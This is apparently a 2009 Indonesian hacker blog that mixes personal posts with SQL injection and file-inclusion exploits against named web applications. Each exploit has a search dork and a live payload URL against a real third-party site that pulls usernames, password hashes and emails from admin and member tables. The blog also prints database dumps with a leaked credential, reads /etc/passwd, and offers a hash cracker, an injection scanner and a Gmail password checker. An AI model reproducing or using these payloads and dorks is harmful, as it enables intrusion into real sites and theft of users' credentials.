Rapid Account Checker

Image

Demo:

Next Malingsial - >>

http://www.e3.net.my/product_detail.php?id=1+AND+1=2+UNION+SELECT+concat_ws%280x7c,id
,username,password,email%29,2%20from%20account--

1|frankbaoxi|5cb804628391408dfa0c4723b028ef27|[email protected]


[+] URL: http://www.e3.net.my/product_detail.php?id=1+AND+1=2+UNION+SELECT+darkc0de,1--
[+] Evasion Used: "+" "--"
[+] 09:41:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: e3net_e3
User: [email protected]
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] e3net_e3

[+] e3net_e3(12) :
[1] account(1) :
id,username,password,last_login,email,name,
[2] blocked(0) :
blockedid,ip,polls,
[3] event_cat(2) :
id,name,date,desc,count,
[4] event_photo(16) :
id,cat_id,image,thumb,
[5] ip(66) :
ipid,title,ip,vote,
[6] news(46) :
id,name,date,content,image,
[7] options(43) :
optionid,pollid,options,images,votes,order_id,
[8] polls(5) :
pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,subdate,status,
[9] product_categories(53) :
id,level,parent,name,
[10] product_photo(64) :
id,product_id,image,thumb,
[11] products(78) :
id,cat_id,primary,name,price,desc,home_img,image,thumb,hit,status,update,
[12] promotions(4) :
id,primary,name,start_date,end_date,desc,image,


mesti di view source .. klo gk gt gk kelihatan.... menurut ku sech...
coba aja sendiri ... xixiixix

Telkomsel Flash BIKIN EMOSI...!!!

Ah..... gara2 telkomselflash yg ada bikin emosi aja....
Tanya Kenapa ????

TAU GAK SEH.... gw itu udah datang ke grapari nya telkomsel yg ada di jalan pemuda surabaya depan delta itu yg diujung jalan, bah lengkap pisan....
udah datang jauh2 antri2 sampe no antrian 485 . hanya karena mau berlangganan telkomselflash. dan cs nya bilang mau disurvey jumat... karena gw datangnya hari selasa tgl 8 - 09.

its ok, gk ada masalah dg org telkomsel yg datang buat survey , karena tepat seperti apa yg dijanjikan. datang hari jumat. nah setelah ngobrol2 kata orang telkomselnya perlu survey ke alamat toko yg di ngaglik, karena waktu ktp masih ikut alamat lama. jadi perlu survey ke toko pada hari sabtu.

Mau tidak mau ya nurut aja, pegawai toko sudah kupesan kalau hari sabtu ada orang telkomsel datang survey.......

disini mulai emosi ...........
udah pas hari sabtu ... gk ada kabar dr orang telkomsel , jangankan datang , pemberitahuan klo ditunda aja gk ada......

sampai senin hari ini pun ... gk ada kabar dari orang telkomsel...


PARAH..... BIKIN EMOSI AJA.... INI MAU LANGGANAN BUKAN MAU MINTA ... MAU LANGGANAN YG PRO PUN YG HARGA 400rb , ITU AJA GK HIRAUKAN..... APALAGI MINTA .. APALAGI MAU LANGGANAN YG 125RB ... AH...

PARAH.....

SANGAT MENGECEWAKAN....!!!!!

Powered by iControl™

================================================
Powered by iControl™
vendors : http://www.icontrolmore.com
by : Angela Chang
contact : [email protected]
================================================

Dork :
"Powered by iControl™"

Vuln :

http://localhost.com/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws(0x7c,account_user_id,account_user_username,account_user_password),2,3 from account_users/*

Demo :
http://icontrolmore.com/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws%280x7c,account_user_id,account_user_username,account_user_password%29,2,3%20from%20account_users/*


http://stuttgartarkansas.org/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws(0x7c,account_user_id,account_user_username,account_user_password),2,3 from account_users/*

===============================================

Silahkan Coli...

09 - 09 - 2009

Ehm..... urutan angka yg bagus....

angka 9 , angka yg banyak digemari.. alias angka favorite...
apalagi bagi org chinese... angka 9 diyakini sebagai angka keberuntungan...
ya ini adalah mitos.. percaya gk percaya sech ..
tapi memang angka 9 sendiri memiliki arti keberuntungan , bagi org islam angka 9 adalah berarti sebagai keadilan.. bener gk ya ?ixixixi saya juga tau waktu denger berita... hehehhe


Tapi buat saya .. angka yg paling saya suka yaitu angka 7, kenapa 7 ... ? jawaban saya adalah karena 7 (tujuh ) bagi adalah angka yg simple... gk neko2 kata org jawa bilang... dan sederhana sekali tapi memiliki karakter..

ya selera dan penilaian orang memang tidak sama... begitupun juga dengan saya... eheheheh banyak angka yg diartikan sebagai keberuntungan dan kesialan, contoh nya seperti angka 13 .. tidak ada disebuah hotel memiliki kamar no 13 ato lantai 13 ... tanya kenapa ? saya jg tidak tau pasti... xixixix tapi kata nya sech angka 13 itu adalah angka setan.. tapi gk tau lagi dah...

Angela 178 itu juga artinya bgs... dan memiliki arti berkembang terus...
tapi ya kembali kepada kepercayaan dan keyakinan masing2.

bagi saya angka 7 is the best... sederhana , gk diatas gk dibawah . gk neko2 , gk muter2 kek angka 8 , xixiix dan yg pasti memiliki karakter tidak seperti angka 1, sama2 sederhana tapi tidak berkarakter...

Pengennya nanti mau ganti plat nomor di mobil ku menjadi L 77 LL tapi berapa duit yaks... aaaaaaaaaaaa... xixiixxi , semoga mami berbaik hati mau biayain buat ganti plat nomor....
wkekkekekkee

Semoga dihari dan ditanggal ini , kita mendapat keberuntungan.... karena hari ini adalah tanggal 9 bulan 9 tahun 2009

amen....!!

angela

Md5 Cr4cker [v 1.5]



Download here!



Cracker:

Gdataonline
Md5decryption
Hashkiller
Passcracking
Insidepro
Md5crack
Md5Live
Md5hood
Icebreaker
Securitystats

Options:

Create Md5
Crack Md5
Save(Export)
Tray Icon
Clear

Start Options:
"-stext Hash C:\log.txt"

Version: 1.5
Coder: Kazuya (Ich

MalingSial vuln

http://whatif.net.my/projects/apostrophe08/panel.php?id=2+AND+1=2+UNION+SELECT+0,1,2,3,4--

[+] apostrophe08(8) :
[1] announcement(11) :
id,type,title,thumb,description,link,timestamp,
[2] flashviewer(3) :
id,sortid,filename,type,pausetime,imgTitle,URLlink,rid,
[3] inspire(7) :
id,title,author,type,thumb,src,timestamp,
[4] news(3) :
id,title,content,status,timestamp,
[5] panel(6) :
id,name,img,description,timestamp,
[6] programme(6) :
id,mode,name,site,img,description,submission_session,ext_form,timestamp,
[7] submission(30) :
id,pid,sortid,uname,uic,ucontact,uemail,uaddress,umisc,stype,svalue,sref,stitle,fthumb,approved,timestamp,
[8] users(3) :
id,uname,upass,disp_name,role,type,last_login,

xixixixix, kok pada rame ya ganyang malingsial...

gk sengaja nemu web ini ya ws... males nyoliin web malaysia sech gw..
nafsu nya sama web uk...
jadi sopo yg mau nyoliin itu web.. monggo dah...

Sql injection Scanner























for download here!.

Semoga Berguna yaks..

mayan bisa c0li biarpun ndak ada botnet... xxixixxixix
ya emang gk semaksimal klo c0li nya manual dari ums google sech...
nama nya juga tools ya gt deh ...

tapi bagaimana pun manual lebih mantabb lha... xxixixi

G-Mail Password Checker




Semoga Berguna .... hasil c0liin ums google .... dapat ini.. mayan posting aja sapa tau Berguna...
xixixixixixi

for download here!

E-commerce Solutions by BangkokDomain.com

==============================================
E-commerce Solutions By BangkokDomain
Vendors : http://www.bangkokdomain.com/
By : Angela Chang
contact : [email protected]
==============================================

Dork :

inurl:index.php?page=product&productid=

Vuln :

http://localhost.com/index.php?page=product&productid=100+AND+1=2+UNION+SELECT+0,1,concat_ws(0x7c,id,uname,email,login_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+member--

Demo site :

http://www.bangkokspyshop.com/index.php?page=product&productid=100+AND+1=2+UNION+SELECT+0,1,concat_ws%280x7c,id,uname,email,login_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+member--

================================================

InReal Internet Technology Co., Ltd.

========================================
InReal Internet Technology Co., Ltd.
vendors : http://www.inreal.com.tw/
by : Angela Chang
========================================
Dork :

Copyright © 2005 InReal Internet Technology Co., Ltd. All Rights Reserved

vuln :

http://localhost.com/products/products_show.php?pid=146&cid=207+AND+1=2+UNION+SELECT+0,concat_ws(0x7c,id,username,password,email),2+
from+members_eng--



demo site :

http://www.necoparts.com/products/products_show.php?pid=146&cid=207+AND+1=2+UNION+SELECT+0,concat_ws%280x7c,id,username,password,email%29,2+from+members_eng--

=========================================

Plogger 3.0

============================================

[0] Plogger 3.0 Remote Blind SQL Injection Vulnerability

Software : Plogger 3.0
Vendor : http://www.plogger.org/
Author : Angela Chang
Contact : [email protected]
Date : 11 August 2009
================================================


[o] Dork

"Powered by Plogger"


[+] Vulnerabilities
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=1 <-- true
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=2 <-- false



[o] Demo Site

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110)

================================================



[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

===============================================

dB Masters Multimedia Directory

===============================================
[0] dB Masters Multimedia Directory SQL Injection Vulnerability

Software : dB Masters Multimedia Directory Link
Vendor : http://www.dbmasters.net/
Author : Angela Chang
Contact : [email protected]
Date : 5 August 2009
===============================================


[o] Dork

"Powered by dB Masters Multimedia Directory"


[o] Exploit

http://localhost/[path]/index.php?ax=deadlink&id=[SQL]
http://localhost/[path]/index.php?ax=list&cat_id=[SQL]



[o] Demo Site

http://webmitter.com/link18/index.php?ax=deadlink&id=-2 UNION SELECT 0,concat_ws(0x7c,id,url,email,password),2 from links--
http://www.judykerr.com/links/index.php?ax=list&cat_id=-8 UNION SELECT 0,1,2,concat_ws(0x7c,id,url,email,password),4 from links--


====================================================
[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

====================================================

CBAuthority - ClickBank Affiliate Management

-:- CBAuthority - ClickBank Affiliate Management
SQL Injection Vulnerability -:-


Vendor : http://www.cbauthority.com/
Author : Angela Chang
Contact : [email protected]
Date : 17 august 2009
-------------------------------------------------------------------------------


Dork :

Powered by CBAuthority


Vulnerabilities :

http://localhost/path/main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--



Demo :


http://www.cbauthority.com/demo/main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--


-----------------------------------------------------------------------------------
Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , str0ke
-----------------------------------------------------------------------------------

# milw0rm.com [2009-08-18]

bug ke 4 ku


In-Portal 4.3.1

@ =========[email protected]
Title : Local File Inclusion Vulnerability
Software : In-Portal 4.3.1
Vendor : http://www.in-portal.net/ [-]
Date : 01 August 2009 (Indonesia)
Author : Angela Chang
Contact : [email protected]

@ ==========[email protected]

[-] Dork

"Powered by In-portal"

[-] Exploit

http://[site]/[path]/index.php?env=-/[LFI]

[-] Demo

http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../..
/../../../../../etc/passwd


{o} ========================================================================{o}

Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001
str0ke

{o} ========================================================================{o}
# milw0rm.com [2009-08-04]
bug ke 3 ku
http://milw0rm.com/exploits/9358

ActiveKB Knowledgebase version X.X

[o]------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability
[o]------------------------------------------------------------------------[o]
| Software : ActiveKB Knowledgebase version X.X |
| Vendor : http://www.interspire.com/activekb/ |
| Date : 02 April 2009 |
| Author : Angela Chang |
| Contact : [email protected] |
[o]--------------------------------------------------------------------------[o]

[»] Google Dork

"Powered by ActiveKB Knowledgebase Software"
inurl:loadpanel.php?Panel=

[»] Vulnerable

./loadpanel.php

[»] Exploit

http://[site]/[path]/loadpanel.php?Panel=[LFI]

[»] Sample

http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]
http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]

[o]---------------------------------------------------------------------------[x]
| Greetz : Speciale Thanks FoR : |
[o]---------------------------------------------------------------------------[o]
| Vrs-hCk , Nyubi (Solpot) , OoN_Boy |
[o]-----------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-03]



bug kedua ku nech
http://milw0rm.com/exploits/8346


Webscene eCommerce

############################################

Webscene eCommerce (level) Remote Sql Injection

vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm

#############################################

Bug Found By :Angela Chang (12-10-2008)
contact: [email protected]
#######################################

Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com

############################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--

Google dork : inurl:productlist.php?categoryid= level

#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded


bug pertama ku , ehheeeheh pertama kali belajar sql ya dapatlha ini bug...